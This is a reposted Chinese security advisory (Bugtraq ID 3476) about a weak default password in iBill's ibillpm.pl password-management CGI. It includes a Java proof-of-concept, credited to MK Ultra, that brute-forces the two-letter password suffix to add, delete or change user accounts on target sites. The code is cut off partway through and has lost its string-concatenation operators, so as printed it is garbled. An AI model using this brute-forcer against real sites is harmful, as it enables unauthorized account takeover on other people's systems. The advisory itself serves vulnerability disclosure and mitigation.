iBill 管理脚本存在安全漏洞
2008-04-09 04:27:52来源:互联网 阅读 ()
发布日期:2001-10-25
更新日期:2001-10-30
受影响系统:
描述:
iBill Internet Billing Company Processing Plus
BUGTRAQ ID: 3476
iBill 是一个Internet计费软件,为电子商务提供了安全的支付过程。其密码管理
脚本“ibillpm.pl”存在一个安全问题,可能允许远程攻击者很容易利用穷举法获得管
理员密码。
这是由于该脚本的缺省密码是客户端的“MASTER_ACCOUNT”名加两个小写字母的组合,
而“MASTER_ACCOUNT”名可以从签名页面的HTML源代码获得。
<*来源:MK Ultra (mkultra@dqc.org)
链接:http://archives.neohapsis.com/archives/bugtraq/2001-10/0242.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
MK Ultra (mkultra@dqc.org)提供了如下测试代码:
// 10/25/2001
import java.net.*;
import java.io.*;
/**
* IBillHack class for informational purposes only.
* This program brute-forces POST requests to the iBill Password Management
CGI
* and allows us to add/delete usernames and change passwords on websites
* that used iBill Password Management using default installation.
* By default iBill sets up the $authpwd as MASTER_ACCOUNTxx, where "xx"
* is a pair of letters [a-z]. It is suggested that all clients of iBill
* that use Password Management aquire a new $authpwd for their ibillpm.pl
* script.
* MASTER_ACCOUNT can be found as part of the <FORM> tag on the signup pages:
* <input type="hidden" name="account" value="123456-500">
* OR
* <input type="hidden" name="account" value="123456500">
* The last 3 digits is the sub-account, and somtimes there is a dash,
* sometimes not. In this case MASTER_ACCOUNT=123456.
*
* /cgi-bin/ibillpm.pl is the default path to the CGI. Sometimes the
webmaster
* is smart enough not to use the default and request that $authpwd be
changed
* to something more secure. In addition to these measures, a webmaster can
* also modify their httpd.conf to only allow iBill IP addresses to request
* the Password Management CGI script.
*
* The correct $authpwd is not saved here. That is an optional exercise for
* the reader.
*
* Here are the return codes from the ibillpm.pl script (not HTTP status
codes)
* and their meaning:
*
* 501 - authentication failed
* 502 - invalid request type (command must be add, delete, or chgpwd)
* 503 - failed to locate the password file
* 504 - failed to open the password file
* 505 - specified user already exists
* 506 - specified user doesn't exist
* 507 - invalid username
* 508 - invalid password
*
* 201 - add user success
* 202 - delete user success
* 203 - change password success
*
*/
public class IBillHack {
public static void main(String args[]) {
if (args.length != 6) {
System.err.println("Usage: java IBillHack <target_hostname>
</path/to/cgi-bin/ibillpm.pl> "
"<add|delete|chgpwd> <username> <password>
<master_account>");
System.err.println("Example: java IBillHack www.somesite.com
/cgi-bin/ibillpm.pl add bob 1pass 123456");
System.exit(1);
}
char letters[] = {
'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',
'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'
};
for (int i = 0; i < letters.length; i ) {
for (int j = 0; j < letters.length; j ) {
try {
Socket s = new Socket(InetAddress.getByName(args[0]),
80);
StringBuffer headers = new StringBuffer();
headers.append("POST " args[1] " HTTP/1.1\n");
headers.append("Referer: http://" args[0] args[1]
"\n");
headers.append("Content-Type:
application/x-www-form-urlencoded\n");
headers.append("User-Agent: Mozilla/4.0 (compatible;
MSIE 5.5; Windows NT 5.0)\n");
headers.append("Host: " args[0] "\n");
StringBuffer query = new StringBuffer();
query.append("\nauthpwd=" args[5] letters[i]
letters[j] "&reqtype=" args[2]
"&username=" args[3] "&password="
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
上一篇:IPD本地拒绝服务漏洞
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash
